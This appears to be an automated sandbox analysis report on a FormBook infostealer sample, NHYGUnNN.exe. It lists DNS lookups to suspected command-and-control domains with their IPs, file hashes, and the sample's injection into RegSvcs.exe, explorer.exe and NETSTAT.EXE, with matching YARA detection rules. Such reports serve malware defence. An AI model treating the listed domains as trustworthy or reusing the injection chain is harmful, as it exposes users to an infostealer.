                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 29, 2022 18:25:06.849574089 CET8.8.8.8192.168.2.60x2214No error (0)www.ope-cctv.com38.55.236.89A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:12.532123089 CET8.8.8.8192.168.2.60x7524No error (0)www.dersameh.com89.31.143.1A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:21.755763054 CET8.8.8.8192.168.2.60x2444No error (0)www.darkchocolatebliss.com54.38.220.85A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:31.068085909 CET8.8.8.8192.168.2.60xa02aNo error (0)www.y31jaihdb6zm87.buzz154.209.6.241A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:50.808146954 CET8.8.8.8192.168.2.60xeb7dNo error (0)www.marketmall.digital162.213.255.142A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.772579908 CET8.8.8.8192.168.2.60xd179No error (0)www.canadianlocalbusiness.com172.67.148.132A (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.772579908 CET8.8.8.8192.168.2.60xd179No error (0)www.canadianlocalbusiness.com104.21.29.63A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.ope-cctv.com
                                        • www.dersameh.com
                                        • www.darkchocolatebliss.com
                                        • www.y31jaihdb6zm87.buzz
                                        • www.marketmall.digital
                                        • www.canadianlocalbusiness.com

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:24:01
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\NHYGUnNN.exe
                                        Imagebase:0x12a25d20000
                                        File size:275456 bytes
                                        MD5 hash:4F9C8432B57FA1AA875071DE547BA947
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:18:24:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
                                        Imagebase:0x830000
                                        File size:45152 bytes
                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:18:24:05
                                        Start date:29/11/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff647860000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Target ID:10
                                        Start time:18:24:38
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                        Imagebase:0x1010000
                                        File size:32768 bytes
                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        Disassembly

                                        No disassembly